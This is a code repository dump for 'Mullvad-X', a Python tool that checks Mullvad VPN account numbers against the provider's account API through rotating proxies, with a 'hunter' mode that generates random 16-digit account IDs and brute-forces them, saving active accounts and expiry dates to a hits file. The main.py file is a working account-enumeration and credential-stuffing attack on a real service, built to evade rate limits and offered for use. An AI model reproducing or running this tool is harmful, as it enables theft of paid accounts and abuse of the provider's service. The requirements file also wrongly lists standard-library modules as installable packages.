├── requirements.txt ├── README.md ├── main.py └── LICENSE /requirements.txt: -------------------------------------------------------------------------------- 1 | requests 2 | string 3 | threading 4 | colorama 5 | os 6 | tkinter 7 | random 8 | sys 9 | ctypes 10 | time 11 | warnings 12 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 |

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16 | 17 | ### Use Http proxies 18 | 19 | --- 20 | 21 | **Install Requirements** 22 | 23 | ``` 24 | pip3 install -r requirements.txt 25 | ``` 26 | 27 | ### Run 28 | 29 | ```shell 30 | py main.py 31 | ``` 32 | -------------------------------------------------------------------------------- /main.py: -------------------------------------------------------------------------------- 1 | import requests # Request module import 2 | from console.utils import set_title # Importing a module to set console title 3 | import random # Random module import 4 | import string # String module 5 | import threading # Threading module 6 | from colorama import Fore # Colorama module 7 | import os # Importing OS module 8 | from tkinter import filedialog # Tkinter module 9 | from random import choice # Random module import 10 | import ctypes # Ctypes module 11 | import sys # Importing sys module 12 | import time 13 | import warnings 14 | warnings.filterwarnings('ignore', message='Unverified HTTPS request') 15 | 16 | class MullvadX: # Our main class (classes are used to organize your code SpEc) 17 | def __init__(self): # This is our main function that passes the self object 18 | # Here we shall define our counter variables 19 | self.good = 0 20 | self.bad = 0 21 | self.custom = 0 22 | self.errors = 0 23 | 24 | def logger(self, account, capture, status): # This function just logs the hits/customs 25 | if status == 'Hit': # Checks the status of the account 26 | with open("hits.txt", "a") as file: # Opens the hits.txt file 27 | file.write(f'{account} | {capture}\n') # Writes the account and capture 28 | elif status == 'Custom': # same as above 29 | with open("custom.txt", "a") as file: # sane thing with custom file 30 | file.write(f'{account} | {capture}\n') # Just writes the account and capture 31 | elif status == 'Error': 32 | with open("errors.txt", 'a') as file: 33 | file.write(f'ERROR: {account}') 34 | 35 | def gen(self, amount): # This function generates the account numbers 36 | for _ in range(amount): # This is just a loop, loops are used for repetitive tasks such as doing the same thing 2-inf times 37 | num = ''.join(random.choice(string.digits) for _ in range(16)) # This generates a random number, the "join" function legit just joins/appends stuff to a string 38 | return num # This is a return statement, it returns the generated value back to wherever the function was called 39 | 40 | def create(self, amount): # This function generates the account numbers 41 | for _ in range(amount): # This is just a loop, loops are used for repetitive tasks such as doing the same thing 2-inf times 42 | num = ''.join(random.choice(string.digits) for _ in range(16)) # This generates a random number, the "join" function legit just joins/appends stuff to a string 43 | open('created.txt', 'a').write(num+'\n') 44 | 45 | def replace(self, text: str, new: dict) -> str: # This function replaces text (I use this for custom prints) 46 | for old, new in new.items(): # Basically the old is just the text your replacing etc 47 | text = text.replace(old, new) # Uses the replace function to just replace the text 48 | return text # Returns to the caller 49 | 50 | def cls(self): 51 | os.system('cls' if os.name == 'nt' else 'clear') 52 | print(Fore.CYAN+r''' 53 | ___ ___ _ _ _ __ __ 54 | | \/ | | | | | | \ \ / / 55 | | . . |_ _| | |_ ____ _ __| |______\ V / 56 | | |\/| | | | | | \ \ / / _` |/ _` |______/ \ 57 | | | | | |_| | | |\ V / (_| | (_| | / /^\ \ 58 | \_| |_/\__,_|_|_| \_/ \__,_|\__,_| \/ \/ 59 | ______ ______ ______ ______ ______ ______ ______ ______ ______ 60 | |______|______|______|______|______|______|______|______|______| 61 | ''') # Prints our fancy title/logoish 62 | 63 | def xprint(self, text: object, end: str = "\n"): # My custom printing function - It's pretty lit 64 | print(self.replace(f" &3>> &f{text}",{ 65 | "&a": Fore.LIGHTGREEN_EX, 66 | "&4": Fore.RED, 67 | "&2": Fore.GREEN, 68 | "&b": Fore.LIGHTCYAN_EX, 69 | "&c": Fore.LIGHTRED_EX, 70 | "&6": Fore.LIGHTYELLOW_EX, 71 | "&f": Fore.RESET, 72 | "&e": Fore.LIGHTYELLOW_EX, 73 | "&3": Fore.CYAN, 74 | "&1": Fore.BLUE, 75 | "&9": Fore.LIGHTBLUE_EX, 76 | "&5": Fore.YELLOW, 77 | "&d": Fore.LIGHTMAGENTA_EX, 78 | "&8": Fore.LIGHTBLACK_EX, 79 | "&0": Fore.BLACK,},),end=end,) 80 | 81 | def checker(self, account_number,proxy_list): # This is our main checker function 82 | proxy = choice(proxy_list) 83 | proxies = { # Defines our proxy settings 84 | 'http': 'http://'+proxy, 85 | 'https': 'http://'+proxy 86 | } 87 | set_title(f"Mullvad-X | Good: {self.good} ~ Custom: {self.custom} ~ Bad: {self.bad} ~ Errors: {self.errors}") # Sets console title 88 | url = f'https://api-www.mullvad.net/www/accounts/{account_number}'.strip('\n').strip(' ') # Our base request url 89 | try: 90 | response = requests.get(url, proxies=proxies, timeout=5, verify=False) # Posts the request to their server 91 | data = response.json() # Get the response from the server 92 | if 'account' in data: 93 | if data['account']['active'] == True: # If account is active 94 | exp_date = data['account']['expires'] # Gets the expiry date from the json response 95 | self.logger(account_number, f'Active: True | Expires: {exp_date}', 'Hit') # Calls the logger function and sends the account data 96 | self.xprint(f'&2[+] HIT | {account_number} | Active: True | Expires: {exp_date}') # Prints the hit 97 | self.good += 1 # Counts it as good 98 | elif data['account']['active'] == False: # If account is not active but is valid 99 | self.logger(account_number, f'Expired', 'Custom') # Same as above, but with custom status 100 | self.xprint(f'&5[+] CUSTOM | {account_number} | Expired') # Counts it as a custom and prints that 101 | self.custom += 1 # Counts it as a custom 102 | elif 'code' in data: # If account not found 103 | if data['code'] == 'ACCOUNT_NOT_FOUND': 104 | self.xprint(f'&4[-] BAD | {account_number}') # Prints that it is bad 105 | self.bad += 1 # Counts it as bad 106 | else: 107 | self.xprint(f'&4[=] ERROR | {account_number} | Rate Limit Exceeded') # Prints that there was a ratelimit 108 | self.errors += 1 # Counts it as an error 109 | except Exception as e: 110 | self.logger(e, '', 'Error') # logs errors to file 111 | self.errors += 1 # Counts it as an error 112 | 113 | def main(self): 114 | set_title(f"Mullvad-X | https://hellishis.me/ | hellish2pro | spec012") # Sets the title for the console 115 | ctypes.windll.user32.MessageBoxW(0, 'Welcome to Mullvad-X an extreme Mullvad login checker, with a built in hunter mode for generating account IDs and checking them! This project contains, proxy & auth proxy support, insane threading optimization, and much more!', 'Mullvad-X | hellish2pro | spec012', 0) # This is a fancy text box 116 | self.cls() # Clears the console and prints our custom fancy logo/title 117 | self.xprint('1. Checker') # Our checker option 118 | self.xprint('2. Hunter - Checker + Generator') # Our Hunter option 119 | self.xprint('3. Generate IDs') # Our generator option 120 | self.xprint('4. Exit') # Exit option 121 | selected = input(' >> ') # Our input/selection 122 | if selected == '1': # Checks if checker is selected 123 | accounts_file = filedialog.askopenfilename(title='Select accounts file: ') # Opens account file selection dialog 124 | proxy_file = filedialog.askopenfilename(title='Select proxy file: ') # Opens proxy file selection dialog 125 | account_list = open(accounts_file).readlines() 126 | proxy_list = open(proxy_file).readlines() # Reads proxylist file 127 | if not proxy_list: # Checks if it's empty/doesn't exist 128 | self.xprint("Proxy list is empty. Please fill it and try again.") # Prints that 129 | return # Returns 130 | if not accounts_file: # Checks if it's empty/doesnt exist 131 | self.xprint("Account list is empty. Please fill it and try again.") 132 | return # Returns 133 | thread_count = input(' Select number of threads\n >> ') # Prompts them to select number of threads 134 | threads = [] # Defines the thread list 135 | self.cls() # Clears the console 136 | for account_number in account_list: # Loops through account list 137 | t = threading.Thread(target=self.checker, args=(account_number.strip('\n').strip(''), proxy_list)) # Creates the threads/defines them 138 | t.start() # Starts the thread 139 | threads.append(t) # Adds the thread to the thread list 140 | 141 | if len(threads) >= int(thread_count): # Checks if the number of threads is greater than the thread limit 142 | for t in threads: # loop through the threadlist 143 | t.join() # Joins the threads 144 | threads.clear() # clears the thread list 145 | 146 | for t in threads: # Loops through the threads 147 | t.join() # Joins the threads 148 | threads.clear() # clears the thread list 149 | elif selected == '2': # Checks if hunter is selected 150 | proxy_file = filedialog.askopenfilename(title='Select proxy file: ') # Opens proxy file selection dialog 151 | proxy_list = open(proxy_file).readlines() # Reads proxylist file 152 | if not proxy_list: # Checks if it's empty/doesn't exist 153 | self.xprint("Proxy list is empty. Please fill it and try again.") # Prints that 154 | return # Returns 155 | amount = input(' Select number of accounts to generate & check\n >> ') # Prompts them to select number of accounts 156 | thread_count = input(' Select number of threads\n >> ') # Prompts them to select number of threads 157 | threads = [] # Defines the list 158 | self.cls() # Clears the console 159 | for i in range(int(amount)): # loop 160 | t = threading.Thread(target=self.checker, args=(self.gen(1).strip('\n').strip(''), proxy_list)) # Defines the thread with variables 161 | t.start() # Starts the thread 162 | threads.append(t) # Appends the thread to the list 163 | 164 | if len(threads) >= int(thread_count): # Checks if the threads are the same amount as thread limit 165 | for t in threads: # Appends the thread to the list 166 | t.join() # Joins the threads 167 | threads.clear() # Clears the threadlist after completion 168 | 169 | for t in threads: # Loops through threads 170 | t.join() # Joins the threads 171 | threads.clear() # Clears the threads 172 | elif selected == '3': 173 | option = input(' How many to generate?\n >> ') 174 | self.create(int(option)) # Calls the creation function 175 | self.xprint(f'Successfully created {option} Account Numbers and placed them into "created.txt"!') 176 | time.sleep(5) 177 | self.main() 178 | elif selected == '4': # Checks if exists is selected 179 | sys.exit() 180 | 181 | if __name__ == '__main__': 182 | MullvadX().main() # Runs our main function 183 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | GNU LESSER GENERAL PUBLIC LICENSE 2 | Version 2.1, February 1999 3 | 4 | Copyright (C) 1991, 1999 Free Software Foundation, Inc. 5 | 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA 6 | Everyone is permitted to copy and distribute verbatim copies 7 | of this license document, but changing it is not allowed. 8 | 9 | [This is the first released version of the Lesser GPL. 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